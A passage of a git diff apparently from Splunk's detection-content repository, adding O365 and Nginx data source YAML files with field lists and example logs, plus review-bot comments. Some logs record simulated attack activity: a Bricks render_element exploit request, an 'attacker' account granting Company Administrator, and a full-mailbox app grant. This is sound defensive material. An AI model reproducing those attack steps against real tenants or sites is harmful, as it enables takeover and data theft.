- HTTP/1.1","server":"Splunkd","site":"18.193.215.146:8000","src_ip":"46.128.24.64","src_mac":"02:AC:9D:85:B5:68","src_port":50021,"status":200,"time_taken":1954,"transport":"tcp","uri_path":"/en-GB/splunkd/__raw/servicesNS/nobody/search/search/jobs/1618989993.8/control"}'
diff --git a/data_sources/network/Sysmon_EventID.yml b/data_sources/network/Sysmon_EventID.yml
deleted file mode 100644
index d2234f2d24..0000000000
--- a/data_sources/network/Sysmon_EventID.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: Sysmon EventID
-id: 4e1d2852-0311-45fa-9162-0316fc39d2da
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
-sourcetype: XmlWinEventLog
-separator: EventID
-supported_TA:
- name: Splunk Add-on for Sysmon
- version: 4.0.0
- url: https://splunkbase.splunk.com/app/5709/
-event_names:
-- event_name: Sysmon EventID 22
- data_source: data_sources/network/event_sources/Sysmon_EventID_22.yml
diff --git a/data_sources/network/event_sources/Sysmon_EventID_22.yml b/data_sources/network/event_sources/Sysmon_EventID_22.yml
deleted file mode 100644
index 7bd38df2d0..0000000000
--- a/data_sources/network/event_sources/Sysmon_EventID_22.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: Sysmon EventID 22
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- QueryName
-- QueryResults
-- QueryStatus
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- answer
-- answer_count
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- process_exec
-- process_guid
-- process_name
-- punct
-- query
-- query_count
-- record_type
-- reply_code_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_product
-example_log: '22542200x8000000000000000566335Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-10 15:13:31.392{51A89197-852C-65D7-F805-000000001D00}5632instance-ffx0xs-relay.screenconnect.com0type: 5 server-nix3a88ddf7-relay.screenconnect.com;::ffff:147.28.146.44;C:\Users\VICTIM\AppData\Local\Apps\2.0\570TKK0R.QDR\28H545QZ.BH8\scre..tion_25b0fbb6ef7eb094_0017.0009_86a5358e17526f84\ScreenConnect.ClientService.exeNT AUTHORITY\SYSTEM'
diff --git a/data_sources/nginx_access.yml b/data_sources/nginx_access.yml
new file mode 100644
index 0000000000..0009ef0fea
--- /dev/null
+++ b/data_sources/nginx_access.yml
@@ -0,0 +1,77 @@
+name: Nginx Access
+id: c716a418-eab3-4df5-9dff-5420174e3068
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Nginx Access
+source: /var/log/nginx/access.log
+sourcetype: nginx:plus:kv
+supported_TA:
+- {}
+fields:
+- _time
+- action
+- app
+- bytes
+- bytes_in
+- bytes_out
+- category
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_ip
+- dest_port
+- eventtype
+- host
+- http_content_type
+- http_method
+- http_referer
+- http_user_agent
+- http_user_agent_length
+- http_x_forwarded_for
+- http_x_header
+- https
+- index
+- linecount
+- nginx_version
+- product
+- protocol
+- punct
+- request_time
+- response_time
+- server
+- site
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- status_description
+- status_type
+- tag
+- tag::eventtype
+- time_local
+- timeendpos
+- timestartpos
+- uri_path
+- url
+- url_domain
+- url_length
+- vendor
+- vendor_product
+- version
+- web_server
+example_log: site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
+ src="198.51.100.1" src_ip="198.51.100.1" user="-" time_local="22/Feb/2024:13:00:00
+ -0500" protocol="HTTP/1.1" status="200" bytes_out="1073741000" bytes_in="234" http_referer="-"
+ http_user_agent="python-requests/2.25.1" nginx_version="1.18.0" http_x_forwarded_for="-"
+ http_x_header="-" uri_query="-" uri_path="/wp-json/bricks/v1/render_element" http_method="POST"
+ response_time="0.250" cookie="-" request_time="0.650" category="application/json"
+ https="on"
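Review bot: `example_log` on L24616–L24622 is an unquoted plain scalar continued over seven lines; it parses today only because none of the continuation lines contains `: ` or ` #`, and a future edit that adds a pair such as `note: x` on one of those lines would turn the value into a nested mapping or a parse error. The other example_log values in this change are single-quoted (kubernetes_falco at L24262, for instance); wrapping this one the same way, `example_log: 'site="www.example.com" ... https="on"'`, removes the fragility with no change in the folded value. The deleted Nginx_Access.yml had the same unquoted form, so this is a pre-existing quirk carried over rather than a regression.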
diff --git a/data_sources/o365.yml b/data_sources/o365.yml
new file mode 100644
index 0000000000..ea48f23702
--- /dev/null
+++ b/data_sources/o365.yml
@@ -0,0 +1,13 @@
+name: O365
+id: b32de97d-0074-4cca-853c-db22c392b6c0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
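Review bot: o365.yml has no `fields:` key, unlike every other data source object in this change (the per-Operation O365 files each list their fields). If this is meant to be an umbrella object for `o365:management:activity` that the Operation-specific files refine via `separator: Operation`, the `description` should say so, e.g. `description: Parent data source for O365 management activity; per-Operation objects carry the field lists.`; if the schema requires `fields`, an explicit `fields: []` would at least make the omission deliberate. I cannot tell from the diff which of the two the loader expects.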
diff --git a/data_sources/o365_add_app_role_assignment_grant_to_user_.yml b/data_sources/o365_add_app_role_assignment_grant_to_user_.yml
new file mode 100644
index 0000000000..85e1f044e9
--- /dev/null
+++ b/data_sources/o365_add_app_role_assignment_grant_to_user_.yml
@@ -0,0 +1,108 @@
+name: O365 Add app role assignment grant to user.
+id: ce1d7849-a1d2-47fd-b6eb-d7ef854a860c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add app role assignment grant to user.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- ClientIP
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- extended_properties
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID":
+ "10037FFEA938FB92", "Type": 3}, {"ID": "74658136-14ec-4630-ad9b-26e160ff0fc6", "Type":
+ 2}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484",
+ "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "ActorIpAddress": "40.124.84.4", "AzureActiveDirectoryEventType": 1, "ClientIP":
+ "40.124.84.4", "CreationTime": "2021-01-19T22:21:39", "ExtendedProperties": [{"Name":
+ "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value":
+ "User"}], "Id": "8b9e5417-c310-4382-89da-c0f25c5c0576", "InterSystemsId": "85c80877-c529-4487-8f44-48760767cc6c",
+ "IntraSystemId": "6fc81447-9c94-4734-8bd7-307bb699c04e", "ModifiedProperties": [{"Name":
+ "AppRole.Id", "NewValue": "97edced9-9f34-4eef-9b49-84a5ebcd5167", "OldValue": ""},
+ {"Name": "AppRole.Value", "NewValue": "arn:aws:iam::111111111111:role/rodonmicrotestrole,arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft",
+ "OldValue": ""}, {"Name": "AppRole.DisplayName", "NewValue": "rodonmicrotestrole,rodsotoonmicrosoft",
+ "OldValue": ""}, {"Name": "User.ObjectID", "NewValue": "7646f1a9-620c-4630-b5e4-b02838be5562",
+ "OldValue": ""}, {"Name": "User.UPN", "NewValue": "vagrant@rodsoto.onmicrosoft.com",
+ "OldValue": ""}, {"Name": "User.PUID", "NewValue": "100320010972E450", "OldValue":
+ ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88",
+ "OldValue": ""}], "ObjectId": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88",
+ "Operation": "Add app role assignment grant to user.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID":
+ "ServicePrincipal_9fd10db9-dfe2-4d74-a724-c837eb8764d9", "Type": 2}, {"ID": "9fd10db9-dfe2-4d74-a724-c837eb8764d9",
+ "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Amazon Web Services (AWS)",
+ "Type": 1}, {"ID": "3e71560f-3e31-45ab-b439-46328fe55b88", "Type": 2}, {"ID": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88",
+ "Type": 4}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId":
+ "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
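Review bot: The trailing period in `name: O365 Add app role assignment grant to user.` (L24648) appears to be carried into the filename as `..._grant_to_user_.yml`, and the service-principal object at L24756 has the same `_.yml` suffix. The period is presumably faithful to the O365 `Operation` value (the example_log on L24748 shows `"Operation": "Add app role assignment grant to user."`), so it belongs in the matched value, but the slugified filename reads as accidental with the dangling underscore. If the filename is generated from `name`, stripping trailing punctuation in the generator fixes both files at once.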
diff --git a/data_sources/o365_add_app_role_assignment_to_service_principal_.yml b/data_sources/o365_add_app_role_assignment_to_service_principal_.yml
new file mode 100644
index 0000000000..84cd4673fc
--- /dev/null
+++ b/data_sources/o365_add_app_role_assignment_to_service_principal_.yml
@@ -0,0 +1,113 @@
+name: O365 Add app role assignment to service principal.
+id: 785ba57a-ba7b-474e-97c8-9474e6e00b3a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add app role assignment to service principal.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2024-02-08T21:49:53", "Id": "a6bee61d-8b3f-42e1-b4fa-778fb05c43ac",
+ "Operation": "Add app role assignment to service principal.", "OrganizationId":
+ "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 8, "ResultStatus": "Success",
+ "UserKey": "Not Available", "UserType": 4, "Version": 1, "Workload": "AzureActiveDirectory",
+ "ObjectId": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com",
+ "UserId": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+ (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:28:58 PST
+ 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\"}"},
+ {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties":
+ [{"Name": "AppRole.Id", "NewValue": "dc890d15-9560-4a4c-9b7f-a736ec74ec40", "OldValue":
+ ""}, {"Name": "AppRole.Value", "NewValue": "full_access_as_app", "OldValue": ""},
+ {"Name": "AppRole.DisplayName", "NewValue": "Use Exchange Web Services with full
+ access to all mailboxes", "OldValue": ""}, {"Name": "AppRoleAssignment.CreatedDateTime",
+ "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "AppRoleAssignment.LastModifiedDateTime",
+ "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "ServicePrincipal.ObjectID",
+ "NewValue": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "OldValue": ""}, {"Name": "ServicePrincipal.DisplayName",
+ "NewValue": "STRT_Oauth", "OldValue": ""}, {"Name": "ServicePrincipal.AppId", "NewValue":
+ "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "ServicePrincipal.Name",
+ "NewValue": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames",
+ "NewValue": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com",
+ "OldValue": ""}], "Actor": [{"ID": "LegacyTestOAuthApp", "Type": 1}, {"ID": "869dc64b-95b2-4003-8098-3ba39296ea46",
+ "Type": 2}, {"ID": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type":
+ 2}, {"ID": "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type": 2}, {"ID": "ServicePrincipal",
+ "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId":
+ "ed53faec-49b5-444f-b6af-b928558ca433", "IntraSystemId": "00000000-0000-0000-0000-000000000000",
+ "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_8429eb5c-faeb-4ade-8eac-acc003790769",
+ "Type": 2}, {"ID": "8429eb5c-faeb-4ade-8eac-acc003790769", "Type": 2}, {"ID": "ServicePrincipal",
+ "Type": 2}, {"ID": "Office 365 Exchange Online", "Type": 1}, {"ID": "00000002-0000-0ff1-ce00-000000000000",
+ "Type": 2}, {"ID": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com",
+ "Type": 4}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/o365_add_mailboxpermission.yml b/data_sources/o365_add_mailboxpermission.yml
new file mode 100644
index 0000000000..c56bf31a15
--- /dev/null
+++ b/data_sources/o365_add_mailboxpermission.yml
@@ -0,0 +1,83 @@
+name: O365 Add-MailboxPermission
+id: 9c0babdb-bb15-449e-abba-0a9cdb3fc061
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add-MailboxPermission
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- AccessRights
+- AppId
+- ClientAppId
+- ClientIP
+- CreationTime
+- ExternalAccess
+- Id
+- Identity
+- InheritanceType
+- ObjectId
+- Operation
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- Parameters{}.Name
+- Parameters{}.Value
+- RecordType
+- ResultStatus
+- SessionId
+- User
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.159.234.121:30395",
+ "CreationTime": "2020-12-15T10:18:53", "ExternalAccess": false, "Id": "bb6e31a3-e98f-493d-bbff-08d8a0e2d2b0",
+ "ObjectId": "jhernan", "Operation": "Add-MailboxPermission", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341
+ (15.20.3654.025)", "Parameters": [{"Name": "Identity", "Value": "jhernan"}, {"Name":
+ "User", "Value": "Patrick Bareiss"}, {"Name": "AccessRights", "Value": "FullAccess"},
+ {"Name": "InheritanceType", "Value": "All"}], "RecordType": 1, "ResultStatus": "True",
+ "SessionId": "2be46662-a743-4a05-8744-c2f75f886512", "UserId": "pbareiss@rodsoto.onmicrosoft.com",
+ "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
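Review bot: ResultStatus in this Exchange cmdlet sample is the string `"True"` (the example_log member before `"SessionId"`), whereas the AzureActiveDirectory-workload sources added in this commit carry `"Success"` and the MailItemsAccessed/ModifyFolderPermissions samples carry `"Succeeded"`; nothing in the data source records this, so a detection filtering on `ResultStatus=Success` would silently drop these events. A comment above `fields:` such as `# ResultStatus is "True"/"False" for Exchange cmdlet audit records, not "Success"/"Succeeded" as in other o365 workloads` would save detection authors a round trip. The sample `ClientIP` also carries a port suffix (`18.159.234.121:30395`); whether the add-on strips it before populating the listed `src_ip` field is not visible here, so it is worth confirming before a detection joins on that field.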
diff --git a/data_sources/o365_add_member_to_role_.yml b/data_sources/o365_add_member_to_role_.yml
new file mode 100644
index 0000000000..09fc920144
--- /dev/null
+++ b/data_sources/o365_add_member_to_role_.yml
@@ -0,0 +1,106 @@
+name: O365 Add member to role.
+id: 8b949f7c-4b5d-404f-9694-d7403c4ec096
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add member to role.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-20T16:50:46", "Id": "30a8b107-b190-406c-9b80-c3f5c3a29129",
+ "Operation": "Add member to role.", "OrganizationId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "lowpriv@splunkresearch.onmicrosoft.com",
+ "UserId": "attacker@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name":
+ "extendedAuditEventCategory", "Value": "Role"}], "ModifiedProperties": [{"Name":
+ "Role.ObjectID", "NewValue": "0ee19da2-ee3d-4743-ae53-8cb79599c384", "OldValue":
+ ""}, {"Name": "Role.DisplayName", "NewValue": "Company Administrator", "OldValue":
+ ""}, {"Name": "Role.TemplateId", "NewValue": "62e90394-69f5-4237-9190-012177145e10",
+ "OldValue": ""}, {"Name": "Role.WellKnownObjectName", "NewValue": "TenantAdmins",
+ "OldValue": ""}], "Actor": [{"ID": "attacker@splunkresearch.onmicrosoft.com", "Type":
+ 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal",
+ "Type": 1}, {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f",
+ "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User",
+ "Type": 2}], "ActorContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5", "InterSystemsId":
+ "6a6b4dfe-8b77-49db-9999-510115d1f3dd", "IntraSystemId": "c36bfbae-b287-415b-bc14-ab5c3a9248d7",
+ "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72",
+ "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User",
+ "Type": 2}, {"ID": "lowpriv@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID":
+ "10032002CC029AE9", "Type": 3}], "TargetContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5"}'
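Review bot: The `description` on the hunk's sixth line only restates `name`; since this file is the documentation a detection author sees for the source, it should say what the record is, e.g. `description: AzureActiveDirectory-workload audit record written when a principal is added to a directory role; the role appears in ModifiedProperties (Role.DisplayName, Role.TemplateId) and the added member in Target.` The same placeholder description pattern appears in every new data source in this commit (add owner to application, add service principal, change user license, consent to application, disable strong authentication, MailItemsAccessed, ModifyFolderPermissions, set company information). A style nit on the same files: the trailing period in the Operation name has been carried into the slug as a trailing underscore (`o365_add_member_to_role_.yml` and the other `_.yml` paths), which suggests the slug routine replaces punctuation instead of stripping it.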
diff --git a/data_sources/o365_add_owner_to_application_.yml b/data_sources/o365_add_owner_to_application_.yml
new file mode 100644
index 0000000000..a0d2109a5d
--- /dev/null
+++ b/data_sources/o365_add_owner_to_application_.yml
@@ -0,0 +1,107 @@
+name: O365 Add owner to application.
+id: da012cbf-af6e-40ee-a1ba-32a5f8da8f8a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add owner to application.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-07T13:42:04", "Id": "6e2c723b-8f6e-47f4-8c60-fa23ef3fccee",
+ "Operation": "Add owner to application.", "OrganizationId": "48203edf-5d2c-45f2-8123-a368cc8b0e51",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "user2@contoso.onmicrosoft.com",
+ "UserId": "user@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties":
+ [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh;
+ Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0
+ Safari/537.36\"}"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}],
+ "ModifiedProperties": [{"Name": "Application.ObjectID", "NewValue": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f",
+ "OldValue": ""}, {"Name": "Application.DisplayName", "NewValue": "TestApp2", "OldValue":
+ ""}, {"Name": "Application.AppId", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454",
+ "OldValue": ""}], "Actor": [{"ID": "user@contoso.onmicrosoft.com", "Type": 5}, {"ID":
+ "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type":
+ 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f",
+ "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51",
+ "InterSystemsId": "3f6a58c5-2fba-401d-b137-82b860830213", "IntraSystemId": "e8034ddc-0ca3-4aca-996c-1dc6dee48679",
